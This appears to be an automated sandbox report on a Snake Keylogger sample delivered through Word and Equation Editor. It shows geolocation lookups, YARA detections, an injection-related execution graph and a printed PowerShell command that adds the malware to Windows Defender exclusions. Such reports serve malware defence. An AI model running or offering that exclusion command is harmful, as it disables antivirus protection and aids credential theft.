                    2024-07-01 18:06:16 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                    2024-07-01 18:06:16 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.2249166188.114.96.34433244C:\Users\user\AppData\Roaming\obie8920193.exe
                    TimestampBytes transferredDirectionData
                    2024-07-01 18:06:16 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                    Host: reallyfreegeoip.org
                    2024-07-01 18:06:17 UTC714INHTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:17 GMT
                    Content-Type: application/xml
                    Transfer-Encoding: chunked
                    Connection: close
                    access-control-allow-origin: *
                    vary: Accept-Encoding
                    Cache-Control: max-age=86400
                    CF-Cache-Status: HIT
                    Age: 13138
                    Last-Modified: Mon, 01 Jul 2024 14:27:19 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iDYqpHSB1JFGvh1y9I%2Fo74%2FmoeErqjl1lVzlvV6gKn%2FGmtaihFUZ9siQtzS95SfPWsbKMDgwyyayWwVxNH%2BjHXX7yeSiU%2BpCTlzMWgFB%2BTNxcu8zxT5EQ1KIen7psZbs29dw6R%2Bg"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 89c8543c5d4543c4-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-01 18:06:17 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                    2024-07-01 18:06:17 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    3192.168.2.2249168188.114.96.34433244C:\Users\user\AppData\Roaming\obie8920193.exe
                    TimestampBytes transferredDirectionData
                    2024-07-01 18:06:18 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                    Host: reallyfreegeoip.org
                    2024-07-01 18:06:18 UTC704INHTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:18 GMT
                    Content-Type: application/xml
                    Transfer-Encoding: chunked
                    Connection: close
                    access-control-allow-origin: *
                    vary: Accept-Encoding
                    Cache-Control: max-age=86400
                    CF-Cache-Status: HIT
                    Age: 13139
                    Last-Modified: Mon, 01 Jul 2024 14:27:19 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iR8iHa6KkWEmCKJxz9n8T24w0TuH9L%2FpLFKym0fGvMGo723SumFD%2BYGngXCwJ8Tcmm2ruYBmo7lPAVio4EsdYobMZqKUYYR1vlnl8Ud9vX1g9lEFsqdHmJRfKNOtBS5HLgUNwVl8"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 89c854462d790c84-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-01 18:06:18 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                    2024-07-01 18:06:18 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    4192.168.2.2249170188.114.96.34433244C:\Users\user\AppData\Roaming\obie8920193.exe
                    TimestampBytes transferredDirectionData
                    2024-07-01 18:06:19 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                    Host: reallyfreegeoip.org
                    Connection: Keep-Alive
                    2024-07-01 18:06:19 UTC708INHTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:19 GMT
                    Content-Type: application/xml
                    Transfer-Encoding: chunked
                    Connection: close
                    access-control-allow-origin: *
                    vary: Accept-Encoding
                    Cache-Control: max-age=86400
                    CF-Cache-Status: HIT
                    Age: 13140
                    Last-Modified: Mon, 01 Jul 2024 14:27:19 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=43T3zv8Q1aaysuuCBIt3moD11kw5yB6HWyz46PEX5Q%2FnRswueXRLu3SodkM9v2JMawe64A7yGDgEXBEvu3paRmEz9GDK3%2Ffm6Yyz8mYW5T0v7kpXKNCB9%2FQrc%2F6L2LuJslzt8miI"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 89c8544d7c225e7a-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-01 18:06:19 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                    2024-07-01 18:06:19 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    5192.168.2.2249172188.114.96.34433244C:\Users\user\AppData\Roaming\obie8920193.exe
                    TimestampBytes transferredDirectionData
                    2024-07-01 18:06:21 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                    Host: reallyfreegeoip.org
                    Connection: Keep-Alive
                    2024-07-01 18:06:22 UTC714INHTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:22 GMT
                    Content-Type: application/xml
                    Transfer-Encoding: chunked
                    Connection: close
                    access-control-allow-origin: *
                    vary: Accept-Encoding
                    Cache-Control: max-age=86400
                    CF-Cache-Status: HIT
                    Age: 13143
                    Last-Modified: Mon, 01 Jul 2024 14:27:19 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JaPtc6FEf%2BoUsHK%2Fi5Imy%2FlFV6uVxBp70fT%2F3YlurQGm8WkkyZ6EMpbTdUQjxOyinKyJYyMJm5fuLeI1uAYK%2FtMaOj2%2BkKkxNJEMYG4knjwIfmQm58CzYGHh%2FafVCostk8bU7okS"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 89c8545bbd0cc45c-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-01 18:06:22 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                    2024-07-01 18:06:22 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    6192.168.2.2249174188.114.96.34433244C:\Users\user\AppData\Roaming\obie8920193.exe
                    TimestampBytes transferredDirectionData
                    2024-07-01 18:06:23 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                    Host: reallyfreegeoip.org
                    2024-07-01 18:06:23 UTC712INHTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:23 GMT
                    Content-Type: application/xml
                    Transfer-Encoding: chunked
                    Connection: close
                    access-control-allow-origin: *
                    vary: Accept-Encoding
                    Cache-Control: max-age=86400
                    CF-Cache-Status: HIT
                    Age: 13144
                    Last-Modified: Mon, 01 Jul 2024 14:27:19 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fa0WjLV7TgBE%2Bnld6DnKNvdMW6t3csmiMl%2FPdYaoZU5we7A8wzAU7QQnXNQvLHSTrd2Lkb7UFL3Mj4jXfxWiuj9uc%2B0hn1xGVU4cS8KGC7z81XtZGvkjK1wy4HOFwdDJ9n1pRP%2F%2B"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 89c85463d9050f83-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-01 18:06:23 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                    2024-07-01 18:06:23 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    7192.168.2.2249176188.114.96.34433244C:\Users\user\AppData\Roaming\obie8920193.exe
                    TimestampBytes transferredDirectionData
                    2024-07-01 18:06:24 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                    Host: reallyfreegeoip.org
                    Connection: Keep-Alive
                    2024-07-01 18:06:24 UTC706INHTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:24 GMT
                    Content-Type: application/xml
                    Transfer-Encoding: chunked
                    Connection: close
                    access-control-allow-origin: *
                    vary: Accept-Encoding
                    Cache-Control: max-age=86400
                    CF-Cache-Status: HIT
                    Age: 13145
                    Last-Modified: Mon, 01 Jul 2024 14:27:19 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yu4Epu9XjvlWjBXA66tQ7pBVUXtdRyca4Ee%2FSZOx29WkFNuLSnkQrWydE6b6Zi6IrdygPUyKBKO85yn6MRefZbljyYBmrNCYhUnPWBvghnE0%2BynVX%2FVdMdj7FWmyxO26dN6FeEIh"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 89c8546b78f44238-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-01 18:06:24 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                    2024-07-01 18:06:24 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    8192.168.2.2249178188.114.96.34433244C:\Users\user\AppData\Roaming\obie8920193.exe
                    TimestampBytes transferredDirectionData
                    2024-07-01 18:06:25 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                    Host: reallyfreegeoip.org
                    2024-07-01 18:06:25 UTC710INHTTP/1.1 200 OK
                    Date: Mon, 01 Jul 2024 18:06:25 GMT
                    Content-Type: application/xml
                    Transfer-Encoding: chunked
                    Connection: close
                    access-control-allow-origin: *
                    vary: Accept-Encoding
                    Cache-Control: max-age=86400
                    CF-Cache-Status: HIT
                    Age: 13146
                    Last-Modified: Mon, 01 Jul 2024 14:27:19 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t9Ud279Pe9%2FoUu3%2BPZKcTcpfWTjG4UubZXYj%2BEv3EmlKSUmph6fwo1v1vGxYyTbPpFjV2bM8B3V%2Fs65VvrtsFoKZldOLgkf7bNleD8NK5Q4iMBWwfA0%2BLuJNEbIwxT2oZaJJ7tPZ"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 89c85472f8d042ea-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-01 18:06:25 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                    Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                    2024-07-01 18:06:25 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Target ID:0
                    Start time:14:06:03
                    Start date:01/07/2024
                    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                    Imagebase:0x13f7e0000
                    File size:1'423'704 bytes
                    MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:false

                    General

                    Target ID:2
                    Start time:14:06:04
                    Start date:01/07/2024
                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                    Imagebase:0x400000
                    File size:543'304 bytes
                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:5
                    Start time:14:06:08
                    Start date:01/07/2024
                    Path:C:\Users\user\AppData\Roaming\obie8920193.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Roaming\obie8920193.exe"
                    Imagebase:0x290000
                    File size:554'504 bytes
                    MD5 hash:DBDACF479A9DD40133701E06E6DC401C
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.366574375.0000000003579000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.366574375.0000000003579000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.366574375.0000000003579000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000005.00000002.366574375.0000000003579000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                    Antivirus matches:
                    • Detection: 100%, Joe Sandbox ML
                    Reputation:low
                    Has exited:true

                    General

                    Target ID:6
                    Start time:14:06:11
                    Start date:01/07/2024
                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obie8920193.exe"
                    Imagebase:0x90000
                    File size:427'008 bytes
                    MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:7
                    Start time:14:06:11
                    Start date:01/07/2024
                    Path:C:\Users\user\AppData\Roaming\obie8920193.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Roaming\obie8920193.exe"
                    Imagebase:0x290000
                    File size:554'504 bytes
                    MD5 hash:DBDACF479A9DD40133701E06E6DC401C
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.864143938.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.864143938.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.864143938.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000007.00000002.864143938.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.864677424.00000000023DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.864677424.0000000002231000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:false

                    General

                    Target ID:9
                    Start time:14:06:26
                    Start date:01/07/2024
                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    Wow64 process (32bit):true
                    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                    Imagebase:0x400000
                    File size:543'304 bytes
                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:false

                    Disassembly

                    Reset < >

                      Execution Graph

                      Execution Coverage:16.9%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:4.8%
                      Total number of Nodes:105
                      Total number of Limit Nodes:5
                      execution_graph 10489 1c0dbf 10492 1c0a2c 10489->10492 10491 1c0a3b 10492->10491 10494 1c1978 10492->10494 10495 1c1992 10494->10495 10512 1c1fdd 10495->10512 10516 1c1dc2 10495->10516 10521 1c20e1 10495->10521 10526 1c1fa7 10495->10526 10531 1c2707 10495->10531 10537 1c23c5 10495->10537 10542 1c21e5 10495->10542 10547 1c1eea 10495->10547 10555 1c268a 10495->10555 10559 1c1f89 10495->10559 10563 1c222f 10495->10563 10568 1c2013 10495->10568 10571 1c1f34 10495->10571 10576 1c1c58 10495->10576 10581 1c273e 10495->10581 10496 1c0e15 10586 26fea0 10512->10586 10590 26fea8 10512->10590 10513 1c1ff7 10517 1c1d41 10516->10517 10518 1c1e1b 10517->10518 10594 1c04f4 10517->10594 10598 1c0500 10517->10598 10518->10496 10522 1c2111 10521->10522 10602 1c0168 10522->10602 10606 1c0161 10522->10606 10523 1c1ec4 10523->10496 10527 1c1fb4 10526->10527 10610 26f980 10527->10610 10614 26f978 10527->10614 10528 1c23f1 10532 1c23dc 10531->10532 10533 1c2714 10531->10533 10535 26f980 ResumeThread 10532->10535 10536 26f978 ResumeThread 10532->10536 10534 1c23f1 10535->10534 10536->10534 10538 1c23cb 10537->10538 10540 26f980 ResumeThread 10538->10540 10541 26f978 ResumeThread 10538->10541 10539 1c23f1 10540->10539 10541->10539 10543 1c21e8 10542->10543 10545 26f980 ResumeThread 10543->10545 10546 26f978 ResumeThread 10543->10546 10544 1c23f1 10545->10544 10546->10544 10618 1c29f0 10547->10618 10622 1c2a00 10547->10622 10548 1c1f1f 10549 1c283f 10548->10549 10551 1c0168 WriteProcessMemory 10548->10551 10552 1c0161 WriteProcessMemory 10548->10552 10549->10496 10550 1c1ec4 10550->10496 10551->10550 10552->10550 10557 1c0168 WriteProcessMemory 10555->10557 10558 1c0161 WriteProcessMemory 10555->10558 10556 1c26ae 10557->10556 10558->10556 10560 1c1f95 10559->10560 10561 1c239e 10560->10561 10630 1c02c8 